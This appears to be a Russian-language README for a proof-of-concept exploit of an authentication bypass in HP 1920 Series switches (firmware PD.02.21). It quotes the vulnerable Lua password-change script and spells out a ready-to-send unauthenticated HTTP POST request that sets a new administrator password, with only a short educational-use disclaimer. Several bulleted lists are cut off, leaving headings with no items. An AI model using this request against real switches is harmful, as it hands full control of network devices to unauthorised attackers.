
Доказательство концепции эксплуатации обхода аутентификации в коммутаторах HP серии 1920, позволяющее неавторизованно изменить пароль администратора с помощью специально сформированного HTTP POST-запроса.
Версия прошивки: PD.02.21
Затронутые устройства: HP 1920 Series Smart Managed Switches
В этом репозитории документируется критическая уязвимость обхода аутентификации в коммутаторах HP 1920 Series Smart Managed Switches с версией прошивки PD.02.21. Уязвимость позволяет неаутентифицированному злоумышленнику изменить пароль администратора без предварительной аутентификации, что фактически даёт полный контроль над устройством.
Уязвимость существует в скрипте /login/default_password_cfg.lua, который обрабатывает изменение пароля по умолчанию для устройства. Этот скрипт:
oldPwd паролю по умолчанию (который является пустым)Ключевой уязвимый участок в default_password_cfg.lua:
if (request_method == 'POST') then
-- No authentication or session checks!
local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
-- ...
if form_post.oldPwd ~= defaultPassword then
errorStatus = "401 Unauthorized"
errorText = label.old_password_mismatch
else
-- Proceeds to change password
-- ...
end
end
В скрипте отсутствуют критические средства безопасности:
Злоумышленник может использовать эту уязвимость с помощью простого HTTP POST-запроса:
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]
username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]
Примечание: параметр oldPwd оставлен пустым, так как пароль по умолчанию пуст.
Эта уязвимость позволяет неаутентифицированному злоумышленнику:
У меня не было времени исследовать, кто первоначально обнаружил эту уязвимость; я просто публикую доказательство концепции.
Эта информация предоставлена только в образовательных целях. Автор не несёт ответственности за любое неправомерное использование этой информации. Всегда получайте надлежащее разрешение перед тестированием на уязвимости.